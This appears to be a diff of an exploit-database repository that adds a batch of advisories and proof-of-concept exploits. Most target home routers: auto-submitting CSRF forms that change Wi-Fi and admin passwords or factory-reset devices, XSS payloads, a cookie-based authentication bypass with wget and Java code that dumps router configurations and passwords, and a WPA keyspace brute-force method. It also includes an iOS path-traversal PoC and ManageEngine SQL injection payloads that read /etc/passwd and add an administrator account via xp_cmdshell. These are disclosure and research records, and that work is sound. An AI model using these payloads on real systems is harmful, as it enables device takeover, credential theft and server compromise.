Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

53
platforms/hardware/webapps/30358.txt Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: UPC Ireland Cisco EPC 2425 Router / Horizon Box
# Google Dork:
# Date: 11/12/2013
# Author: Matt O'Connor / Planit Computing
# Advisory Link: http://www.planitcomputing.ie/upc-wifi-attack.pdf
# Version:
# Category: Remote
# Tested on: Cisco EPC 2425 / Horizon Box
The Cisco EPC 2425 routers supplied by UPC are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
The WPA-PSK pass phrase has the following features:
? Random
? A to Z Uppercase only
? 8 characters long
? 208,827,064,576 possible combinations ( AAAAAAAA ? ZZZZZZZZ ) 26^8
We notified UPC about the problem in November 2011 yet UPC are still supplying customers with newer modems / horizon boxes that use this algorithm.
At the time, graphics cards were expensive and clustering several machines was not financially viable to the average hacker.
We recently purchased a used rig, comprising off:
? Windows 7
? I3 Processor
? 4GB RAM
? 2TB Drive
? Radeon HD 5850
We generated 26 dictionary files using ?mask processor? by ATOM, piping each letter out to its own file, for example:
A: ./mp32 A?u?u?u?u?u?u?u > A.TXT = AAAAAAAA ? AZZZZZZZ
B: ./mp32 B?u?u?u?u?u?u?u > B.TXT = BAAAAAAA ? BZZZZZZZ
etc
Each .txt file weighed in at around 60GB?s each. The 26 files took up about 1.6TB of storage.
We now had the complete key space, partitioned into 26 different files. This allowed us to distribute the brute force attack amongst multiple computers. There are other ways with ocl-hashcat but this was the simplest.
Using our Radeon HD5850 on standard settings, we were hitting 80,000 keys per second. Breakdown below:
? 26^8 = 208,827,064,576 ( 208 billion possible combinations )
? 26^8 / 80,000 keys per second = 2,610,338 seconds
? 2,610,338 / 60 seconds = 43,505 minutes
? 43,505 / 60 minutes = 725 hours
? 725 hours / 24 hours = 30 Days
For ?185, we had built a computer that could crack the default UPC wireless password within 30 days. The WPA-PSK handshake we used started with the letter D and was cracked within 96 hours.
We ended up getting a second machine for the same price which resulted in our maximum cracking time being reduced to 15 days.
If you?re using the default password on your UPC broadband connection, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols.

114
platforms/hardware/webapps/30361.txt Executable file
View file

@ -0,0 +1,114 @@
# Exploit Title: Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities
# Date: 12/13/2013
# Author: SaMaN( @samanL33T )
# Vendor Homepage:http://www.beetel.in/node/10139
# Category: Hardware/Wireless Router
# Firmware Version: TM4-0Q-020 and below
# Tested on: Beetel 450-TC1 Wireless Router
# Patch/ Fix: Upgrade to latest firmware version/ move to Beetle 450-TC2
---------------------------------------------------
Technical Details
~~~~~~~~~~~~~~~~~~
Beetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.
Exploit Code
~~~~~~~~~~~~~
Change Wifi (WPA2/PSK) password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/home_wlan_1"
method="POST" name="form">
<input type="hidden" name="wlanWEBFlag" value="0">
<input type="hidden" name="wlan_APenable" value="1">
<input type="hidden" name="Countries_Channels" value="[Any Country]">
<input type="hidden" name="Channel_ID" value="00000000">
<input type="hidden" name="AdvWlan_slPower" value="High">
<input type="hidden" name="BeaconInterval" value="100">
<input type="hidden" name="RTSThreshold" value="2347">
<input type="hidden" name="FragmentThreshold" value="2346">
<input type="hidden" name="DTIM" value="1">
<input type="hidden" name="WirelessMode" value="802.11b+g">
<input type="hidden" name="WLSSIDIndex" value="1">
<input type="hidden" name="ESSID_HIDE_Selection" value="0">
<input type="hidden" name="ESSID" value="[SSID of WLAN]">
<input type="hidden" name="WEP_Selection" value="WPA2-PSK">
<input type="hidden" name="wlanWEPFlag" value="0">
<input type="hidden" name="wlanGEMTEKFlag" value="0">
<input type="hidden" name="wlanGEMTEKCMDFlag" value="0">
<input type="hidden" name="wlanGEMTEKDeactiveAPFlag" value="0">
<input type="hidden" name="wlanRadiusWEPFlag" value="0">
<input type="hidden" name="TKIP_Selection" value="AES">
<input type="hidden" name="PreSharedKey" value="[WIFI PASSWORD]">
<input type="hidden" name="WPARekeyInter" value="0">
<input type="hidden" name="WDSMode_Selection" value="0">
<input type="hidden" name="WDSEncryType_Selection" value="TKIP">
<input type="hidden" name="WDSKey" value="">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLAN_FltActive" value="0">
<input type="hidden" name="WLAN_FltAction" value="00000000">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="CountryChange" value="0">
</form>
</body>
</html>
Factory Reset Router Settings by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="1">
<input type="hidden" name="Restart" value="RESTART">
</form>
</body>
</html>
Change Router's Admin Password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_admin_1"
method="POST" name="form">
<input type="hidden" name="uiViewTools_Password" value="12345">
<input type="hidden" name="uiViewTools_PasswordConfirm" value="12345">
</form>
</body>
</html>
Restart Router by CSRF
~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="0">
<input type="hidden" name="Restart" value="RESTART">
</form>
</body>
</html>
--
SaMaN
twitter : @samanL33T <https://twitter.com/samanL33T>

51
platforms/hardware/webapps/30362.txt Executable file
View file

@ -0,0 +1,51 @@
#######################################################################
# Exploit Title: Cisco EPC3925 ? Cross Site Request Forgery
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925
# CVE: N/A
#######################################################################
# Description:
#
# This proof of concept demonstrates that the admin password can be
# changed by an attacker in a CSRF attack. However, it seems like any
# setting in the device can be manipulated using an attack like this.
#
#
# Side note: The device does not ask for the current password.
#
#
# Location:
#
# POST http://[target]/goform/Quick_setup
#
# Parameters:
#
# Password=&PasswordReEnter=&save=Save+Settings
#
# PoC:
#
# <html>
#
# <form name="reseller" method="POST"
action="http://[target]/goform/Quick_setup" id="csrf_attack"
target="csrf_iframe">
# <input type="hidden" name="Password" value="attackers_password">
# <input type="hidden" name="PasswordReEnter" value="attackers_password">
# <input type="hidden" name="save" value="Save Settings">
# </form>
#
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
#
# <script>
# document.getElementById('csrf_attack').submit();
# </script>
# <center>The payload has been executed....</center>
#
# </html>
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/

55
platforms/hardware/webapps/30415.txt Executable file
View file

@ -0,0 +1,55 @@
#######################################################################
# Exploit Title: Cisco EPC3925 - Persistent Cross Site Scripting
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925
# CVE: N/A
#######################################################################
# Description
# The parameter DdnsHostName is vulnerable to Persistent Cross Site Scripting.
# However, there is client side input validation, which can easily be bypassed.
#
# Location:
#
# POST http://[target]/goform/Setup_DDNS
#
# Parameters:
#
#DdnsService=0&DdnsUserName=xxx&DdnsPassword=****&DdnsHostName=<Enter Payload Here>&save=Save+Settings
#
# Payload
#
# PoC: "><input onmouseover=prompt(document.cookie)>
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-persistent-xss/

210
platforms/hardware/webapps/30476.txt Executable file
View file

@ -0,0 +1,210 @@
Document Title:
===============
Song Exporter v2.1.1 RS iOS - File Include Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1172
Release Date:
=============
2013-12-19
Vulnerability Laboratory ID (VL-ID):
====================================
1172
Common Vulnerability Scoring System:
====================================
7.4
Product & Service Introduction:
===============================
ong Exporter Pro lets you transfer via Wi-Fi the songs you have in your iPhone, iPod touch or iPad to any
computer in your network. No iTunes required. Now you can backup your songs, share them with your friends
and workmates, and stream them directly to almost any media player! The ability to directly access your
own music on your iPhone is something that Apple should have built into their iOS devices, but Song
Exporter Pro fills that void quite nicely. This is an app that everyone should get. Song Exporter Pro is
a must have app if you love to share your music with friends. They nailed such a basic essential need
that is a major pain point for iOS devices users. It`s reliable, lightweight and easy to use.
(Copy of the Homepage: https://itunes.apple.com/us/app/song-exporter-pro/id421646421 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Rocha Software Song Exporter 2.1.1 Pro iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2013-12-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Rocha Software
Product: Song Exporter - Mobile Web Application (iOS) 2.1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file/path include web vulnerability has been discovered in the official Rocha Software Song Exporter 2.1.1 Pro mobile web-application for apple iOS.
The local file include web vulnerability allows remote attackers to unauthorized include local file requests or system specific path commands to
compromise the web-application or device.
The local file include web vulnerability is located in the vulnerable `artist`,`album`,`name(filename)` value of the `Index File Dir List` module (web-interface).
Remote attackers are able to sync via itunes own files with malicious filename, artist titel or album name. The attack vector is persistent and the request
method is GET. The local file/path include execute occcurs in the main `file dir index` list. The security risk of the local file include web vulnerability
is estimated as high(-) with a cvss (common vulnerability scoring system) count of 7.4(+)|(-)7.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized
local file include web attacks.
Vulnerable Input(s):
[+] Song Exporter Pro - Index Song Dir List
Vulnerable Parameter(s):
[+] Name (filename)
[+] Artist (name)
[+] Album (name)
Affected Module(s):
[+] Index File Dir List (http://localhost:8080)
[+] Songs Path (http://localhost:8080/songs/)
[+] File - Unicode Playlist
[+] File - Playlist
Proof of Concept (PoC):
=======================
The local file include web vulnerabilities can be exploited by local attackers with physical device access or restricted user accounts without
user interaction. For security demonstration or to reproduce follow the provided information and steps below.
PoC: Name (filename)
<table style="width:780px" id="maintable" border="0" cellpadding="0" cellspacing="0">
<thead><tr>
<th class="asc" width="60"><h3>Pos</h3></th>
<th class="head" width="300"><h3>Name</h3></th>
<th class="head" width="60"><h3>Time</h3></th>
<th class="head" width="180"><h3>Artist</h3></th>
<th class="head" width="180"><h3>Album</h3></th>
</tr></thead>
<tbody>
<tr class="evenrw"><td class="evensl" align="right">1</td>
<td><a href="http://localhost:8080/songs/../[LOCAL FILE INCLUDE VULNERABILITY!]\.mp3">[LOCAL FILE INCLUDE VULNERABILITY!].mp3</a></td>
<td align="right">3:27</td>
<td>Blumentopf</td>
<td>Wir</td></tr>
</tbody>
</table>
PoC: Artist (name)
<table style="width:780px" id="maintable" border="0" cellpadding="0" cellspacing="0">
<thead><tr>
<th class="asc" width="60"><h3>Pos</h3></th>
<th class="head" width="300"><h3>Name</h3></th>
<th class="head" width="60"><h3>Time</h3></th>
<th class="head" width="180"><h3>Artist</h3></th>
<th class="head" width="180"><h3>Album</h3></th>
</tr></thead>
<tbody>
<tr class="evenrw"><td class="evensl" align="right">1</td>
<td><a href="http://localhost:8080/songs/Blumentopf/Wir/Systemfuck.mp3">Systemfuck.mp3</a></td>
<td align="right">3:27</td>
<td>../[LOCAL FILE INCLUDE VULNERABILITY!]\</td>
<td>Wir</td></tr>
</tbody>
</table>
PoC: Album (name)
<table style="width:780px" id="maintable" border="0" cellpadding="0" cellspacing="0">
<thead><tr>
<th class="asc" width="60"><h3>Pos</h3></th>
<th class="head" width="300"><h3>Name</h3></th>
<th class="head" width="60"><h3>Time</h3></th>
<th class="head" width="180"><h3>Artist</h3></th>
<th class="head" width="180"><h3>Album</h3></th>
</tr></thead>
<tbody>
<tr class="evenrw"><td class="evensl" align="right">1</td>
<td><a href="http://localhost:8080/songs/Blumentopf/Wir/Systemfuck.mp3">Systemfuck.mp3</a></td>
<td align="right">3:27</td>
<td>Blumentopf</td>
<td>../[LOCAL FILE INCLUDE VULNERABILITY!]\</td></tr>
</tbody>
</table>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable artist name, song filename and album values.
Encode and restrict also the direct songs folder path with the html file dir list.
Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

47
platforms/hardware/webapps/30547.txt Executable file
View file

@ -0,0 +1,47 @@
######################################################################
# Exploit Title: {D-Link DSL-2750U} CSRF Vulnerability
# Author: khaledmohdar(Mysterious guy)
# E-mail: fighterxwar@gmail.com(www.facebook.com/khaledmohdar)
# Category: Hardware
# Google Dork: N/A
# Vendor: http://www.dlink.com/
# Firmware Version: ME_1.09
# Product: http://www.dlinkmea.com/site/index.php/site/productDetails/232
# Tested on: Windows 7 32-bit
######################################################################
1)Introduction
==============
D-Link DSL-2750U High-Speed Internet The DSL-2750U Wireless N ADSL2+ 4-Port
Wi-Fi Router is a versatile,
high-performance router for home and the small office.
With integrated ADSL2/2+ supporting download speeds up to 24 Mbps,
firewall protection, Quality of Service (QoS), 802.11n wireless LAN,
and 4 Ethernet switch ports,
this router provides all the functions that a home or small office needs to
establish
a secure and high-speed
link to the Internet. Ultimate Wireless Connection with Maximum Security
============================================
2)Vulnerability Description
This router allows an attacker to bypass authentication and login to the
setup page
after that just make any settings and save or apply it and it's going to
say "worng old password"
Don't worry just hit ok . now you are in the Router settings you can
Download the config file
or whatever yuo want!
and now you can easily make a new settings Includes a new login password
#Exploit
========
open this link
192.168.1.1/html/config
then Wath my Video
https://www.youtube.com/watch?v=-Yvs_sc1tjQ

173
platforms/hardware/webapps/30665.txt Executable file
View file

@ -0,0 +1,173 @@
Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers Remote Management Web Interface Authentication Bypass Vulnerability
Amplia Security - Amplia Security Research Advisory (AMPLIA-ARA050913)
Advisory ID: AMPLIA-ARA050913
Advisory URL: <tbd>
Date Published: 12-26-2013
Vendors Contacted: Nisuta (www.nisuta.com)
Release Mode: Coordinated Release
Last Updated: 12-25-2013
Index
-----
1. Vulnerability Information
2. Vulnerability Description
3. Vulnerable Systems
4. Vendor Information, solutions and workarounds
5. Credits
6. Technical Description
7. Disclaimer
1.Vulnerability Information
---------------------------
Impact: Remote attackers can bypass authentication and access the router's management web interface obtaining complete control of the device
Remotely Exploitable: Yes
Bugtraid Id: <unknown>
CVE: <unknown>
2.Vulnerability Description
----------------------------
The Nisuta (www.nisuta.com) NS-WIR150NE and NS-WIR300N wireless routers provide a remote management web interface available both on the WAN (not enabled by default) and LAN interfaces (enabled by default).
This remote management web interface requires a password.
A remote attacker can bypass authentication and gain access to the remote management web interface, taking control of the device, without knowing the password.
3.Vulnerable Systems
--------------------
Nisuta NS-WIR150NE wireless router, firmware v5.07.41
Nisuta NS-WIR300N wireless router, firmware v5.07.36_NIS01 (hardware version v3.0)
and probably other Nisuta wireless routers with similar firmware.
4.Vendor Information, Solutions and Workarounds
-----------------------------------------------
The vendor made available the following firmware updates:
Nisuta NS-WIR150NE
http://www.nisuta.com/producto.asp?id=NSWIR150NE
http://www.nisuta.com/drivers/NSWIR150NE.rar
Nisuta NS-WIR150NF
http://www.nisuta.com/producto.asp?id=NSWIR150NF
http://www.nisuta.com/drivers/NSWIR150NF.rar
Nisuta NS-WIR300N
No firmware update is available. The router remains vulnerable.
The fix implemented by the vendor is not optimal, although better than any workaround.
As a workaround, disable remote management on the WAN interface (not enabled by default). However, it is not possible to disable remote management on the LAN interface, and
applying the fix is recommended.
It is possible to restrict remote management on the WAN interface based on source IP address, but given the critical nature of this vulnerability we do not recommend it as a workaround.
It is also worth mentioning that the remote management web interface works over http without encryption, even with the flaw described in this advisory fixed, the interface is still insecure for other reasons.
5.Credits
---------
This vulnerability was discovered by Amplia Security Research.
We thank Nisuta for their efforts to try to fix this vulnerability and improve the security of their products.
6. Technical Description
------------------------
The Nisuta NS-WIR150NE and NS-WIR300N wireless routers provide a remote management web interface available both on the WAN (not enabled by default) and LAN interfaces (enabled by default).
This remote management web interface requires a password and uses form-based authentication (performed over http without encryption, which is another issue).
After entering the correct password, the router's remote management web interface always sets the same cookie, shown next:
Set-Cookie: admin:language=en; path=/
This cookie is hard-coded and obviously insecure.
Using this cookie in a HTTP request is enough to "bypass authentication" and login to the remote management web interface as an administrator without knowing the password.
The 'admin' value is not even required. For example,
Cookie: :language=en; path=/
is enough to gain access to the router.
PoC Exploit:
An unauthenticated remote attacker on the WAN and LAN interfaces can perform any action available on the router's remote management web interface, as an example, the following command will bypass authentication and download the router's configuration which includes the current remote management web interface password among other confidential information:
$ wget --header="Cookie: :language=en" http://192.168.2.1/cgi-bin/DownloadCfg/config.cfg -t 1
The password is in the 'http_passwd' variable:
$ grep http_passwd config.cfg
http_passwd=mysecretpassword
$
The attacker can now conveniently login into the remote management web interface with full control and perform changes, obtain information, etc.
Again, the password is not needed, the attacker can just set the cookie 'admin:language=en' in his browser to gain access to the management interface or perform other actions directly, this is just an example.
Custom implementation of the PoC exploit:
// Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers Remote Management Web Interface Authentication Bypass Vulnerability
// Amplia Security - Amplia Security Research Advisory (AMPLIA-ARA050913)
// PoC exploit - dumps the router's configuration files which includes the management interface password
// and other information
// compile: javac poc.java
// run: java poc > router.cfg
import java.net.URL;
import java.net.URLConnection;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
public class poc {
public static void main(String[] args)
{
try {
URL url = new URL("http://192.168.2.1/cgi-bin/DownloadCfg/config.cfg");
URLConnection conn = url.openConnection();
conn.setRequestProperty("Cookie", ":language=en");
BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
String line;
while ((line = rd.readLine()) != null) {
System.out.println(line);
}
} catch(Exception e) {
e.printStackTrace();
}
}
};
7.Disclaimer
------------
The contents of this advisory are copyright (c) 2013 Amplia Security (www.ampliasecurity.com), and
may be distributed freely provided that no fee is charged for distribution and proper credit is given.

36
platforms/hardware/webapps/30667.txt Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: Technicolor TC7200 - Multiple CSRF Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0621
#
# Proof of Concept:
#
#
## Payload for Factory Reset:
#
# POST : http://<ip>/goform/system/factory
# Parameter: None
#
## Payload to disable the advanced options:
#
# POST : http://<ip>/goform/advanced/options
# Parameter: None
#
## Payload to remove ip-filters:
#
# POST : http://<ip>//goform/advanced/ip-filters
# Parameter: IpFilterAddressDelete1 = 1
#
## Payload to remove firewall settings
#
# POST : http://<ip>/goform/advanced/firewall
# Parameter: cbFirewall = 1
#
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/

45
platforms/hardware/webapps/30668.txt Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0620
#
# Proof of Concept:
#
#
## Persistent Cross Site Scripting:
#
# POST : http://<ip>/parental/website-filters.asp
# Parameters:
#
# WebFilteringTable 0
# WebFilteringChangePolicies 0
# WebFiltersADDKeywords
# WebFilteringdomainMode 0
# ADDNewDomain <script>alert('IT Nerdbox');</script>
# WebFiltersKeywordButton 0
# WebFiltersDomainButton 1
# WebPolicyName
# WebFiltersRemove 0
# WebFiltersADD 0
# WebFiltersReset 0
#
#
## Reflected Cross Site Scripting
#
# POST : http://<ip>//goform/status/diagnostics-route
# Parameters:
#
# VmTracerouteHost "><script>alert('IT Nerdbox');</script>
# VmMaxTTL 30
# VmTrIsInProgress 0
# VmTrUtilityCommand 1
#
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/

7
platforms/java/remote/30502.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25340/info
The Sun Java Runtime Environment is prone to a remote privilege-escalation vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers.
http://www.exploit-db.com/sploits/30502.tti

7
platforms/java/webapps/30514.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25391/info
ALeadSoft Search Engine Builder is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/search/search.html?searWords=[XSS]

9
platforms/java/webapps/30674.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26082/info
Stringbeans Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Stringbeans Portal 3.2 is vulnerable; other versions may also be affected.
http://www.example.com/portal/projects?project_id=3&project_name=[XSS]

15
platforms/jsp/webapps/11793.txt
View file

@ -7,12 +7,15 @@ Local / Remote: Remote
Severity: High CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Researcher: Nahuel Grisolía
Vendor Status: Acknowledged. Not fixed.
Vulnerability Description:
A Vulnerability has been discovered in Manage Engine Service Desk Plus, which can be exploited by
malicious people to conduct SQL injection attacks.
Input passed via the "woID" parameter to WorkOrder.do is not properly sanitized before being used in
a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability is confirmed in version 7.6. Other versions may also be affected.
Proof of Concept:
Microsoft Windows Environment with MySQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=6)
@ -20,23 +23,27 @@ union select 1,2,3,4,5,6,7,8,load_file("c:\\boot.ini"),10,11,12,13,14,15,16,17,1
'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetSer
viceDeskWC.ear\\AdventNetServiceDesk.war\\images\\boot.ini'/*
then browse, http://x.x.x.x:8080/images/boot.ini
Microsoft Windows Environment with MSSQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1); EXEC xp_cmdshell 'net user
moebius m03biu5inj3ct$ /add';--
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1); EXEC xp_cmdshell 'net localgroup
administrators moebius /add';--
GNU/Linux with MySQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1%29%20union%20select%201,2,3,4,5,
6,7,8,load_file%28%27/etc/passwd%27%29,10,11,12,13,14,15,16,17,18,19,20%20into%20dumpfile%
20%27/home/moebius/ManageEngine/ServiceDesk/applications/extracted/AdventNetServiceDesk.eear
/AdventNetServiceDeskWC.ear/AdventNetServiceDesk.war/images/passwd.txt%27/*
then browse, http://x.x.x.x:8080/images/passwd.txt
Impact: Execute arbitrary SQL queries.
Solution: Not fixed.
Vendor Response:
First contact on January 12, 2010. Last contact on March 15, 2010. They wont fix this issue in the
upcoming hotfix. I consider that 2 months is a really long time to fix this kind of High priority issue.
First contact on January 12, 2010. Last contact on March 15, 2010. They wont fix this issue in the upcoming hotfix. I consider that 2 months is a really long time to fix this kind of High priority issue.
The vendor knows that this advisory will be released. No more contact since then.
Contact Information:
For more information regarding the vulnerability feel free to contact the researcher at
nahuel.grisolia <at> gmail <dot> com
For more information regarding the vulnerability feel free to contact the researcher at nahuel.grisolia <at> gmail <dot> com

9
platforms/jsp/webapps/30563.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25531/info
Apache Tomcat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Apache Tomcat 4.1.31; other versions may also be affected.
http://www.example.com/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert("XSS!")%3c%2fscript%3e

9
platforms/jsp/webapps/30608.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25803/info
JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input.
Attacker-supplied HTML and script code will run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
